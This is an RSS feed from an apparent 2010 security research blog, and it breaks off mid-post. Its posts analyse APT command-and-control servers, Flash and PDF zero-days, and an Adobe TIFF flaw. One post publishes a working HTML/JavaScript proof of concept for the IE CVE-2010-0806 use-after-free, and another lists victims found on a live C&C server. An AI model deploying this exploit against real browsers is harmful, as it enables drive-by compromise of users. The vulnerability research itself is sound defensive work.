<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SSS: Security-Sucks</title>
	<atom:link href="http://rootkit.tw/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://rootkit.tw/blog</link>
	<description></description>
	<lastBuildDate>Mon, 19 Jul 2010 18:32:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=2687</generator>
		<item>
		<title>APT Never Dies</title>
		<link>http://rootkit.tw/blog/?p=236</link>
		<comments>http://rootkit.tw/blog/?p=236#comments</comments>
		<pubDate>Mon, 19 Jul 2010 18:16:29 +0000</pubDate>
		<dc:creator>darkfloyd</dc:creator>
				<category><![CDATA[Malware Research]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=236</guid>
		<description><![CDATA[Inspired with one of the section about Advanced Persistent Threat (APT) and Botnet C&#38;C server from Mr. Yung in HIT (Hack In Taiwan) 2010[1] conference, we have worked out and tried to search live C&#38;C servers to dig into more details in APT area. APT is defined as a kind of targeted attack against high value information with strong resources and authority supported.

With reference to the Shadow in the Cloud Report[2] published in April, in fact, we have experienced that Google has done some filtering itself, however, we have got some lucks and search out active C&#38;C server successfully.]]></description>
			<content:encoded><![CDATA[<h2>Introduction</h2>
<p>Inspired with one of the section about Advanced Persistent Threat (APT) and Botnet C&amp;C server from Mr. Yung in Bot2010 2010<sub>[1] </sub>conference, I and Mars have worked out and tried to search live C&amp;C servers to dig into more details in APT area. APT is defined as a kind of targeted attack against high value information with strong resources and authority supported.</p>
<p>With reference to the Shadow in the Cloud Report<sub>[2]</sub> published in April, in fact, we have experienced that Google has done some filtering itself, however, we have got some lucks and search out active C&amp;C server successfully.</p>
<p><span id="more-236"></span></p>
<h2>In the Tiger Cave</h2>
<p>We have located a .php file and two folders named as “cms” and “tools” respectively (Figure 1). In Figure 2, it shows five files in “cms” folder and the most interesting file is the <em>h_INOC-94C966D10D_4137_t </em>as it contains victim information, OS and IP address. (Figure 3).<em> </em></p>
<p><em> </em></p>
<p><em>For c__BRBRBxxx, c_GTxxx and c_VIRUSCLONExxx</em>, the file size and content is the same (Figure 4) and we have not figured its content meaning.</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz359.jpg"><img class="alignnone size-medium wp-image-237" src="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz359-300x107.jpg" alt="C&amp;C Server Folder Structure" width="300" height="107" /></a></p>
<p>Figure 1. C&amp;C Server Folder Structure</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz360.jpg"><img class="alignnone size-medium wp-image-251" src="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz360-300x107.jpg" alt="" width="300" height="107" /></a></p>
<p>Figure 2. Files in “cms” folder</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz361_masked.jpg"><img class="alignnone size-medium wp-image-241" src="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz361_masked-300x94.jpg" alt="" width="300" height="94" /></a></p>
<p>Figure 3. List of victim machines shown in <em>h_INOC-94C966D10D_4137_t </em>file</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz362.jpg"><img class="alignnone size-medium wp-image-239" src="http://rootkit.tw/blog/wp-content/uploads/2010/07/Snapz-Pro-XScreenSnapz362-300x144.jpg" alt="" width="300" height="144" /></a></p>
<p>Figure 4. File content found in <em>c_BRBRBxxx, c_GTxxx </em>and<em> c_VIRUSCLONExxx</em></p>
<p><strong><br />
</strong></p>
<h2>After 24 hours</h2>
<p>We have got a list of victim workstations, which reported to C&amp;C server. We have used domaintools.com<sub>[3]</sub> to match corresponding domain and found a brief summary as below:</p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="107" valign="top"><strong>Country</strong></td>
<td width="92" valign="top"><strong>Number of Infected Machine</strong></td>
<td width="225" valign="top"><strong>Organization(s)/Companies</strong></td>
</tr>
<tr>
<td width="107" valign="top">India</td>
<td width="92" valign="top">5</td>
<td width="225" valign="top">National Information Center, Telecom Service and Internet Backbone Company</td>
</tr>
<tr>
<td width="107" valign="top">Brazil</td>
<td width="92" valign="top">1</td>
<td width="225" valign="top">Telecom Service</td>
</tr>
<tr>
<td width="107" valign="top">Great Britain</td>
<td width="92" valign="top">1</td>
<td width="225" valign="top">High Commission in India</td>
</tr>
<tr>
<td width="107" valign="top">Mexico</td>
<td width="92" valign="top">1</td>
<td width="225" valign="top">Telecom Service</td>
</tr>
<tr>
<td width="107" valign="top">Suriname</td>
<td width="92" valign="top">1</td>
<td width="225" valign="top">Telecom Service</td>
</tr>
<tr>
<td width="107" valign="top">China</td>
<td width="92" valign="top">1</td>
<td width="225" valign="top">Telecom Service</td>
</tr>
<tr>
<td width="107" valign="top">USA</td>
<td width="92" valign="top">1</td>
<td width="225" valign="top">Telecom Service</td>
</tr>
<tr>
<td width="107" valign="top">Total Numbers:</td>
<td width="92" valign="top">11</td>
<td width="225" valign="top"> </td>
</tr>
</tbody>
</table>
<p>We have summarized that the attacks targeted India’s government department and infrastructure as well. It is interesting to find that there is a bot planted in Tibet(西藏) Telecom Service Company in China. In addition, most of the attack targets infrastructure/telecom service companies in a country.</p>
<h2>Summary</h2>
<p>Attack is no longer just for reputation, excitement and fun, there is a kind of attack, which targets high-value information, and for political reasons.</p>
<p><strong><br />
</strong></p>
<h2>Reference</h2>
<p>[1] BoT2010</p>
<p>URL: <a href="anti-botnet.edu.tw/confs/BoT2010.htm">anti-botnet.edu.tw/confs/BoT2010.htm</a></p>
<p>[2] Shadows in the Cloud – An Investigation into Cyber Espionage 2.0 (April 2010)</p>
<p>URL: <a href="http://www.infowar-monitor.net/2010/04/shadows-in-the-cloud-an-investigation-into-cyber-espionage-2-0/">http://www.infowar-monitor.net/2010/04/shadows-in-the-cloud-an-investigation-into-cyber-espionage-2-0/</a></p>
<p>[3] Domaintools -  For  whois and reverse domain name lookup</p>
<p>URL: <a href="http://www.domaintools.com/">http://www.domaintools.com</a></p>
<h2>Appendix: Sample C&amp;C Record</h2>
<p>a:2:{s:8:"hostinfo";a:8:{s:6:"hostid";s:8:"BHARAT-2&#8243;;s:6:"ipaddr";N;s:9:"outipaddr";s:12:" **maskedIP**”;s:7:"macaddr";s:17:"00:E0:4C:92:64:80&#8243;;s:8:"hostname";s:8:"BHARAT-2&#8243;;s:6:"ostype";s:34:"Microsoft Windows XP Professional0&#8243;;s:7:"version";s:5:"0.5.2&#8243;;s:5:"owner";s:6:"bobo10&#8243;;}s:10:"reporttime";s:14:"20100716231202&#8243;;}s:15:"U-052D8518AEE84&#8243;;</p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=236</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Flash zero-day(CVE-2010-1297) used in mass injections</title>
		<link>http://rootkit.tw/blog/?p=193</link>
		<comments>http://rootkit.tw/blog/?p=193#comments</comments>
		<pubDate>Sat, 12 Jun 2010 17:56:29 +0000</pubDate>
		<dc:creator>Mars</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[General Discuss]]></category>
		<category><![CDATA[Malware Research]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=193</guid>
		<description><![CDATA[In recent days, the vulnerability of flash(CVE-2010-1297) has been used for drive-by download. Therefore, many websites are injected by malicious links such as  (hxxp://2677.in/yahoo.js), and those comprised webistes are intruded by automatic mass injection tools.        In most cases, hackers are faster than vendors, so it gives them a great opportunity to build a strong BotNet and be [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/Mass_flash_exp.jpg"></a>In recent days, <strong>the vulnerability of flash(CVE-2010-1297) has been used for drive-by download</strong>. Therefore, many websites are injected by malicious links such as  (hxxp://2677.in/yahoo.js), and those comprised webistes are intruded by automatic mass injection tools.   </p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/Mass_flash_exp.jpg"><img class="alignleft size-medium wp-image-194" title="Mass_flash_exp" src="http://rootkit.tw/blog/wp-content/uploads/2010/06/Mass_flash_exp-268x300.jpg" alt="Mass Injections" width="268" height="300" /></a>   </p>
<div id="attachment_195" class="wp-caption alignright" style="width: 310px"><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/tomtom_exp.jpg"><img class="size-medium wp-image-195" title="tomtom_exp" src="http://rootkit.tw/blog/wp-content/uploads/2010/06/tomtom_exp-300x206.jpg" alt="" width="300" height="206" /></a><p class="wp-caption-text">TOMTOM WebSite is injected by Malicious link</p></div>
<p>In most cases, hackers are faster than vendors, so it gives them a great opportunity to build a strong BotNet and be able to control more victims. <img src='http://rootkit.tw/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />    </p>
<p>The following flow chart shows the attacking path of Zero-Day.     </p>
<p><span id="more-193"></span></p>
<div id="attachment_218" class="wp-caption aligncenter" style="width: 310px"><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/Mass_Injections_malware1.jpg"><img class="size-medium wp-image-218" title="Mass_Injections_malware" src="http://rootkit.tw/blog/wp-content/uploads/2010/06/Mass_Injections_malware1-300x231.jpg" alt="Attacking path of Zero-Day" width="300" height="231" /></a><p class="wp-caption-text">Attacking path of Zero-Day</p></div>
<p><strong>Threat Mitigation :</strong>   </p>
<p>You can temporarily disable or block of the flash.   </p>
<p>Here are three useful blocks.   </p>
<p>FlashBlock:  (firefox) </p>
<p><a href="http://flashblock.mozdev.org/">http://flashblock.mozdev.org/</a>   </p>
<p>ToggleFlash:(IE)   </p>
<p><a href="http://flash.melameth.com/">http://flash.melameth.com/</a></p>
<p>CubeMe:(Chrome)</p>
<p><a href="https://chrome.google.com/extensions/detail/ilejdkfldemlafkeebadjppfhdiimbfd?hl=en">https://chrome.google.com/extensions/detail/ilejdkfldemlafkeebadjppfhdiimbfd?hl=en</a></p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=193</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Flash crash caused by bad P-Code modification (CVE-2010-1297)</title>
		<link>http://rootkit.tw/blog/?p=173</link>
		<comments>http://rootkit.tw/blog/?p=173#comments</comments>
		<pubDate>Thu, 10 Jun 2010 15:04:46 +0000</pubDate>
		<dc:creator>Mars</dc:creator>
				<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=173</guid>
		<description><![CDATA[After analyzing the PDF sample (which is still exploited in the wild),we extract the embedded flash file called "pad.swf"，This file seems modified from the website http://lostinactionscript.googlecode.com/svn/trunk/bin/AES-PHP.swf. If we compare these two files deeply(shown as below), Orginal AES-PHP.swf (0&#215;66) Exploit pad.swf(0&#215;40) It is surprised that there is just 1 byte changed. It causes flash ActionScript to [...]]]></description>
			<content:encoded><![CDATA[<p>After analyzing the PDF sample (which is still exploited in the wild),we extract the embedded flash file called "pad.swf"，This file seems modified from the website <a href="http://lostinactionscript.googlecode.com/svn/trunk/bin/AES-PHP.swf">http://lostinactionscript.googlecode.com/svn/trunk/bin/AES-PHP.swf</a>.</p>
<p>If we compare these two files deeply(shown as below),</p>
<p>Orginal AES-PHP.swf (0&#215;66)</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/AES-PHP_.jpg"><img class="alignleft size-medium wp-image-166" title="AES-PHP_" src="http://rootkit.tw/blog/wp-content/uploads/2010/06/AES-PHP_-300x109.jpg" alt="" width="300" height="109" /></a></p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/PAD.jpg"></a></p>
<p>Exploit pad.swf(0&#215;40)</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/06/PAD.jpg"><img class="alignright size-medium wp-image-167" title="PAD" src="http://rootkit.tw/blog/wp-content/uploads/2010/06/PAD-300x103.jpg" alt="" width="300" height="103" /></a></p>
<p>It is surprised that there is just 1 byte changed. It causes flash ActionScript to execute a newfunction() and disturb the internal ActionScript engine stack .</p>
<p>Here is a problem in the JIT-ed AS code:</p>
<p><span id="more-173"></span></p>
<p>0736E2B1 8B 52 28 mov edx,dword ptr [edx+28h]<br />
0736E2B4 83 E2 F8 and edx,0FFFFFFF8h<br />
0736E2B7 89 55 B8 mov dword ptr [ebp-48h],edx<br />
0736E2BA 8B 52 40 mov edx,dword ptr [edx+40h]<br />
0736E2BD 89 55 B4 mov dword ptr [ebp-4Ch],edx<br />
0736E2C0 8B 50 10 mov edx,dword ptr [eax+10h] &lt;&#8212;<span style="color: #000000;">if you spray the range of memory to "0x2xxxxxxx", then eax will point to there. However,in some cases, eax may change due to different versions.<br />
</span>0736E2C3 89 4D B0 mov dword ptr [ebp-50h],ecx<br />
<span style="color: #000000;">0736E2C6 8B 8A B8 02 00 00 mov ecx,dword ptr [edx+2B8h] &lt;-invalid point may cause access violation<br />
</span>0736E2CC 89 45 A4 mov dword ptr [ebp-5Ch],eax<br />
0736E2CF 8B 55 B0 mov edx,dword ptr [ebp-50h]<br />
0736E2D2 89 55 A8 mov dword ptr [ebp-58h],edx<br />
0736E2D5 89 4D A0 mov dword ptr [ebp-60h],ecx<br />
0736E2D8 8B 4D B4 mov ecx,dword ptr [ebp-4Ch]<br />
0736E2DB 89 4D AC mov dword ptr [ebp-54h],ecx<br />
0736E2DE 8D 4D A4 lea ecx,[ebp-5Ch]<br />
0736E2E1 89 75 9C mov dword ptr [ebp-64h],esi<br />
0736E2E4 8B F0 mov esi,eax<br />
0736E2E6 89 75 98 mov dword ptr [ebp-68h],esi<br />
0736E2E9 89 75 F8 mov dword ptr [ebp-8],esi<br />
0736E2EC 89 4D B4 mov dword ptr [ebp-4Ch],ecx<br />
0736E2EF 8B 4D A0 mov ecx,dword ptr [ebp-60h]<br />
0736E2F2 FF 75 B4 push dword ptr [ebp-4Ch]<br />
0736E2F5 6A 02 push 2<br />
0736E2F7 51 push ecx<br />
0736E2F8 FF 51 0C call dword ptr [ecx+0Ch]</p>
<p>There is a high possibility that adobe will release a patch for JIT engine soon..</p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=173</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New PDF Exploit In The Wild &#8211; CVE-2010-0401 (Bypass ASLR and DEP)</title>
		<link>http://rootkit.tw/blog/?p=162</link>
		<comments>http://rootkit.tw/blog/?p=162#comments</comments>
		<pubDate>Thu, 01 Apr 2010 01:42:52 +0000</pubDate>
		<dc:creator>Hori</dc:creator>
				<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=162</guid>
		<description><![CDATA[New PDF Exploit In The Wild - CVE-2010-0401 (Bypass ASLR and DEP)]]></description>
			<content:encoded><![CDATA[<p>We have noticed a new and powerful PDF exploit ( CVE-2010-0401 ) in the wild,<br />
 that leverages CVE-2010-0401 in order to install a Happy Backdoor in fool&#8217;s system.<br />
This exploit is more stable, it could bypass ASLR and DEP.<br />
The test environment is Adobe Reader 10.0 in Microsoft Windows XP SP3.</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/04/fool_exploit.jpg"><img src="http://rootkit.tw/blog/wp-content/uploads/2010/04/fool_exploit-300x123.jpg" alt="" title="2010_0401_exploit" width="300" height="123" class="alignnone size-medium wp-image-163" /></a></p>
<p>>_<</p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=162</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>reliable CVE-2010-0806 poc &amp; HIT2010</title>
		<link>http://rootkit.tw/blog/?p=133</link>
		<comments>http://rootkit.tw/blog/?p=133#comments</comments>
		<pubDate>Fri, 26 Mar 2010 13:30:16 +0000</pubDate>
		<dc:creator>Nanika</dc:creator>
				<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=133</guid>
		<description><![CDATA[A great celebration of HIT2010 release CVE-2010-0806 Reliable poc CFP for HIT2010 is out http://www.hitcon.org/ WinXP &#38; Vista IE7 reliable poc 6B6DC815   8B46 08          MOV EAX,DWORD PTR DS:[ESI+8] 6B6DC818   8B08             MOV ECX,DWORD PTR DS:[EAX] 6B6DC81A   50             [...]]]></description>
			<content:encoded><![CDATA[<div>
<div>A great celebration of HIT2010</div>
<div>release CVE-2010-0806 Reliable poc</div>
<div>CFP for HIT2010 is out</div>
<div>http://www.hitcon.org/</div>
<div>WinXP &amp; Vista IE7 reliable poc</div>
</div>
<div>6B6DC815   8B46 08          MOV EAX,DWORD PTR DS:[ESI+8]</div>
<div>6B6DC818   8B08             MOV ECX,DWORD PTR DS:[EAX]</div>
<div>6B6DC81A   50               PUSH EAX</div>
<div>6B6DC81B   FF51 08          CALL DWORD PTR DS:[ECX+8]//ECX=0x0c0c0c0c</div>
<div><span id="more-133"></span></div>
<div>
<pre>
<div>&lt;code&gt;</div>
<div>&lt;html&gt;</div>
<div>&lt;head&gt;</div>
<div>&lt;style type="text/css"&gt;</div>
<div>.demo {behavior: url(#default#userData);}</div>
<div>&lt;/style&gt;</div>
<div>&lt;/head&gt;</div>
<div>&lt;script&gt;</div>
<div>function exp() {</div>
<div>for (i = 1; i &lt;10; i ++ ){</div>
<div>hit2010.setAttribute("nanika",document.location);</div>
<div>}</div>
<div>hit2010.setAttribute("nanika",document.getElementsByName("style"));</div>
<div>document.location="about:\u0c0c\u0c0c\u0c0c\u0c0cblank";</div>
<div>}</div>
<div>&lt;/script&gt;</div>
<div>&lt;body onload="exp();"&gt;&lt;/body&gt;</div>
<div>&lt;MARQUEE id="hit2010" class="demo"&gt;&lt;/MARQUEE&gt;</div>
<div>&lt;/html&gt;</div>

&lt;/code&gt;<span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif"><span style="line-height: 19px">
</span></span></pre>
</div>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=133</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>New Arrival: CVE-2010-0806 &#8211; IE6/7 ZeroDay</title>
		<link>http://rootkit.tw/blog/?p=110</link>
		<comments>http://rootkit.tw/blog/?p=110#comments</comments>
		<pubDate>Thu, 11 Mar 2010 09:35:07 +0000</pubDate>
		<dc:creator>Mars</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Malware Research]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=110</guid>
		<description><![CDATA[The new IE zero-day attacking is immediately used in targeted attacks.In the past few days, we have captured a number of samples derived from the version published on  rec-sec website. As you can see, the exploit uses a common heap spary method to build a memory that contains the shellcode. When the shellcode gets executed, a [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/ie_malware.jpg"></a>The new IE zero-day attacking is immediately used in targeted attacks.In the past few days, we have captured a number of samples derived from the version published on  <a href="http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/" target="_blank">rec-sec </a>website.<a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0806_2.jpg"><img class="alignright size-medium wp-image-121" title="CVE-2010-0806_2" src="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0806_2-300x189.jpg" alt="" width="300" height="189" /></a></p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0806_2.jpg"></a><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0806.jpg"></a></p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0806.jpg"></a>As you can see, the exploit uses a common heap spary method to build a memory that contains the shellcode. When the shellcode gets executed, a malware wll be downloaded from a  compromised website.<a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/ie_malware.jpg"></a></p>
<p>The detailed analysis about this malware can be seen from our system.</p>
<p><span id="more-110"></span></p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/bifrost.jpg"></a></p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/bifrost.jpg"><img class="aligncenter size-full wp-image-115" title="bifrost" src="http://rootkit.tw/blog/wp-content/uploads/2010/03/bifrost.jpg" alt="" width="984" height="438" /></a><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/bifrost.jpg"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=110</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Target Attack: The guy leaves a message in exploit by using the vulnerability of CVE-2010-0188</title>
		<link>http://rootkit.tw/blog/?p=49</link>
		<comments>http://rootkit.tw/blog/?p=49#comments</comments>
		<pubDate>Wed, 10 Mar 2010 17:50:37 +0000</pubDate>
		<dc:creator>Mars</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Malware Research]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=49</guid>
		<description><![CDATA[Recently, we also found very frequent, targeted attacks, making use of the patched (not complete ) TIFF  vulnerability (CVE-2010-0188).  What  is interesting is that these exploits insert the javascript as well as crafted TIFF(exploit.tif) into XML Form, and  generate malicious PDF by Adobe livecycle ES. The javascript is embedded within the form, and there is not detected by AV. The track of malicious PDF [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/exploit_pdf_tiff.jpg"></a><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/exploit_pdf_tiff.jpg"></a>Recently, we also found very frequent, targeted attacks, making use of the patched (not complete ) TIFF  vulnerability (CVE-2010-0188). <a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/exploit_pdf_tiff.jpg"><img class="alignright size-medium wp-image-76" title="exploit_pdf_tiff" src="http://rootkit.tw/blog/wp-content/uploads/2010/03/exploit_pdf_tiff-300x166.jpg" alt="" width="300" height="166" /></a><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/targetattack_email.jpg"></a></p>
<p>What  is interesting is that these exploits insert the javascript as well as crafted TIFF(exploit.tif) into XML Form, and  generate malicious PDF by Adobe livecycle ES. The javascript is embedded within the form, and there is not detected by AV.</p>
<p>The track of malicious PDF left by the hacker can be found, and it is likely that the hacker is "Yuange" (袁哥 in Chinese) and "panlab<a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/yuang.jpg"></a><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/yuang1.jpg"></a><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/yuang.jpg"><img class="alignleft size-medium wp-image-106" title="yuang" src="http://rootkit.tw/blog/wp-content/uploads/2010/03/yuang-300x125.jpg" alt="" width="300" height="125" /></a>(exploits lab ? If it is really, I also want to join too.. <img src='http://rootkit.tw/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ".  However, in new version of exploit, we can&#8217;t find the string of Yuange.</p>
<p>As we know more features; more bugs. It is my belief that PDF Exploit will be increasing significantly and be used widely on targeted attacks.</p>
<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/exploit_pdf_tiff.jpg"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=49</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Malware Analysis with Target Attack (CVE-2010-0188 Exploit)</title>
		<link>http://rootkit.tw/blog/?p=50</link>
		<comments>http://rootkit.tw/blog/?p=50#comments</comments>
		<pubDate>Wed, 10 Mar 2010 17:14:39 +0000</pubDate>
		<dc:creator>Hori</dc:creator>
				<category><![CDATA[Computer Forensics]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Malware Research]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=50</guid>
		<description><![CDATA[Recently we captured many PDF files from Chinese hackers (Exploit CVE-2010-0188). Our Automatic Malware Analysis System could inspect such exploit files and analyze Malware.]]></description>
			<content:encoded><![CDATA[<p>Recently, we have captured many PDF files from Chinese hackers (Exploit CVE-2010-0188), and our private Automatic Malware Analysis System could inspect such exploit files and analyze Malware.</p>
<p>There are two case studies to share you guys:<br />
<span id="more-50"></span><br />
The first one is a DLL-Injection Malware, and it also dropped a dll file into c:\windows\system32\pe.dll. The build time of this Malware is just 2010-03-07 (MD5: 5573689815AEBFE7CBD2E3829054A5F0)<br />
<a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0188_A3.png"><img class="alignnone size-full wp-image-62" style="border: 1px solid black;" title="CVE-2010-0188 Malware Analysis" src="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0188_A3.png" alt="" width="882" height="375" /></a></p>
<p>Other one is a kind of Code-Injection Malware, there is no any file will drop into disk! it just only injected the code to infect some processes. That will be very stealth, and very hard to be analyzed by the traditional Malware Analysis System, Sandbox and Honeypot.<br />
As what you see, it is no problem with our Automatic Malware Analysis System <img src='http://rootkit.tw/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<a href="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0188_B2.png"><img class="alignnone size-full wp-image-63" style="border: 1px solid black;" title="CVE-2010-0188 Malware Analysis" src="http://rootkit.tw/blog/wp-content/uploads/2010/03/CVE-2010-0188_B2.png" alt="" width="885" height="410" /></a></p>
<p>Of course there are No Anti-Virus could detect the both Malware samples.<br />
I just want to say to Hackers: Good Job, man!<br />
^_^</p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=50</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CVE-2010-0188, APSB10-07 PDF Exploit demonstration</title>
		<link>http://rootkit.tw/blog/?p=34</link>
		<comments>http://rootkit.tw/blog/?p=34#comments</comments>
		<pubDate>Wed, 24 Feb 2010 08:01:39 +0000</pubDate>
		<dc:creator>Mars</dc:creator>
				<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=34</guid>
		<description><![CDATA[Adobe Reader has been recently updated to version 9.3.1, fixing a vulnerability for LibTiff  "TIFFReadDirectory" function. This vulnerability originated from  CVE-2006-3459 was reported by Tavis Ormandy, Google Security Team. Adobe just fixed AcroForm.api file ,but ImageConversion.api still have a vulnerability too. When program load or insert a crafted TIFF image file,the stack of return-addr and SEH can be [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://rootkit.tw/blog/wp-content/uploads/2010/02/tiff1.jpg"><img class="alignright size-medium wp-image-35" title="SEH Overflow" src="http://rootkit.tw/blog/wp-content/uploads/2010/02/tiff1-300x236.jpg" alt="" width="300" height="236" /></a>Adobe Reader has been recently updated to version 9.3.1, fixing a vulnerability for LibTiff  "TIFFReadDirectory" function.</p>
<p>This vulnerability originated from  CVE-2006-3459 was reported by Tavis Ormandy, Google Security Team. Adobe just fixed AcroForm.api file ,but ImageConversion.api still have a vulnerability too.</p>
<p>When program load or insert a crafted TIFF image file,the stack of return-addr and SEH can be overflowed by bad fetching data operation.<br />
<span id="more-34"></span><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="480" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://rootkit.tw/blog/wp-content/uploads/2010/02/TTIF_Exploit.swf" /><embed type="application/x-shockwave-flash" width="640" height="480" src="http://rootkit.tw/blog/wp-content/uploads/2010/02/TTIF_Exploit.swf"></embed></object><a href="http://rootkit.tw/blog/wp-content/uploads/2010/02/tiff2.jpg"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=34</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Chip and PIN is Broken</title>
		<link>http://rootkit.tw/blog/?p=26</link>
		<comments>http://rootkit.tw/blog/?p=26#comments</comments>
		<pubDate>Sun, 14 Feb 2010 18:01:44 +0000</pubDate>
		<dc:creator>Mars</dc:creator>
				<category><![CDATA[General Discuss]]></category>

		<guid isPermaLink="false">http://rootkit.tw/blog/?p=26</guid>
		<description><![CDATA[Pin and Chip bypass the pin code EMV is the dominant protocol used for smart card payments worldwide, with over 730 million cards in circulation. Known to bank customers as “Chip and PIN”, it is used in Europe; it is being introduced in Canada; and there is pressure from banks to introduce it in the [...]]]></description>
			<content:encoded><![CDATA[<div class="mceTemp">
<dl id="attachment_27" class="wp-caption alignright" style="width: 310px;">
<dt class="wp-caption-dt"><a href="http://rootkit.tw/blog/wp-content/uploads/2010/02/2564.png"><img class="size-medium wp-image-27" title="Man in the Middle attack" src="http://rootkit.tw/blog/wp-content/uploads/2010/02/2564-300x175.png" alt="Pin and Chip bypass the pin code" width="300" height="175" /></a></dt>
<dd class="wp-caption-dd">Pin and Chip bypass the pin code</dd>
</dl>
<p>EMV is the dominant protocol used for smart card<br />
